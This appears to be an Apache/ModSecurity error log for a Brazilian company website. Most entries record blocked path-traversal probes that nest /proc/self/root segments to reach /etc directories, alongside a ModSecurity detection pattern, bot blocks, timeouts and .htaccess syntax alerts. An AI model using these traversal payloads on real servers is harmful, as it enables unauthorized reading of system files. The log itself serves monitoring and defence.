[Wed Mar 18 17:01:09.809149 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:38404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absEhfu8EFLIOrSqIps9cwAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:01:15.781902 2026] [mime_magic:error] [pid 14269:tid 140411624429312] (70014)End of file found: [client 57.141.18.42:53382] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:01:27.318733 2026] [mime_magic:error] [pid 15826:tid 140411641214720] (70014)End of file found: [client 57.141.18.123:53578] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:01:29.109157 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52804] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:01:38.897961 2026] [core:alert] [pid 15826:tid 140411582465792] [client 57.141.18.121:53780] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:01:54.244384 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:33604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absEsgbLMZ6AikZjR9X-AwAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:01:56.267241 2026] [core:alert] [pid 9530:tid 140411658000128] [client 57.141.18.68:54366] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Wed Mar 18 17:01:56.438142 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53242] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:02:04.143487 2026] [mime_magic:error] [pid 9530:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:36914] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/kbd/keymaps/legacy
[Wed Mar 18 17:02:04.143854 2026] [access_compat:error] [pid 9530:tid 140411716749056] [client 74.7.243.128:36914] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/kbd/keymaps/legacy
[Wed Mar 18 17:02:20.854964 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:57258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absEzAkwaGbbGflqUZBQCQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 17:02:23.125875 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53762] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:02:25.907778 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:48570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absE0f-YZRR_7pZ7nDIuFAAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:02:35.303464 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:47122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absE2-yqAr6etmhZHNoHNwAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 17:02:39.608043 2026] [mime_magic:error] [pid 11816:tid 140411716749056] (70014)End of file found: [client 57.141.18.58:55322] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:02:39.625807 2026] [mime_magic:error] [pid 9800:tid 140411649607424] (70014)End of file found: [client 57.141.18.74:55084] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:02:50.129818 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54256] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:03:00.209927 2026] [core:alert] [pid 15051:tid 140411574073088] [client 216.73.216.191:17286] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:03:19.119303 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54756] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:03:53.141783 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55336] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:04:28.133835 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:04:38.508804 2026] [core:alert] [pid 27293:tid 140411683178240] [client 57.141.18.106:57416] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:05:02.848578 2026] [mime_magic:error] [pid 14269:tid 140411649607424] (70014)End of file found: [client 57.141.18.23:58142] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:05:03.086454 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56714] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:05:34.037841 2026] [proxy_fcgi:error] [pid 9530:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57342] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:05:42.888705 2026] [mime_magic:error] [pid 11816:tid 140411716749056] (70014)End of file found: [client 57.141.18.72:57696] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:06:03.133833 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57958] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:06:04.802681 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.244.43:44488] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absFrOoXxyEfFpUF8f-zugAAAU4"]
[Wed Mar 18 17:06:09.088684 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.228.61:43430] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absFseyqAr6etmhZHNoHfwAAAFA"]
[Wed Mar 18 17:06:25.507317 2026] [proxy_fcgi:error] [pid 29882:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58450] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:06:48.133805 2026] [proxy_fcgi:error] [pid 29882:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59020] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:06:49.168279 2026] [mime_magic:error] [pid 15051:tid 140411658000128] (70014)End of file found: [client 57.141.18.48:59680] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:07:10.123015 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59546] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:07:32.153785 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60056] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:07:33.332668 2026] [core:alert] [pid 17887:tid 140411548894976] [client 57.141.18.26:32866] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Wed Mar 18 17:07:42.174323 2026] [mime_magic:error] [pid 30077:tid 140411725141760] (70014)End of file found: [client 57.141.18.8:32840] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:07:55.105839 2026] [proxy_fcgi:error] [pid 23798:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60506] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:08:01.254592 2026] [mime_magic:error] [pid 31803:tid 140411708356352] (70014)End of file found: [client 57.141.18.11:33436] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:08:05.111875 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 57.141.18.94:33306] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:08:08.689863 2026] [mime_magic:error] [pid 27293:tid 140411624429312] (70014)End of file found: [client 74.7.243.128:44942] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/include
[Wed Mar 18 17:08:08.690117 2026] [access_compat:error] [pid 27293:tid 140411624429312] [client 74.7.243.128:44942] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/include
[Wed Mar 18 17:08:18.121784 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:32792] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:08:26.161416 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:50616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGOuyqAr6etmhZHNoHrAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:08:29.100431 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:38464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGPMdf6f5d65gmYZQToQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:08:30.403274 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:40948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGPuoXxyEfFpUF8f-z5AAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:08:32.585874 2026] [:error] [pid 9530:tid 140411658000128] [client 74.7.241.31:40956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGQASuyh5UNeevTVfifgAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:08:35.386979 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.241.31:40972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGQ_-YZRR_7pZ7nDIusgAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:08:43.157836 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33362] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:08:54.776254 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:39848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGVUzinOy1jxa1j4dbswAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:08:59.435579 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:50870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGW0zinOy1jxa1j4dbtQAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:09:04.543061 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.241.31:54724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 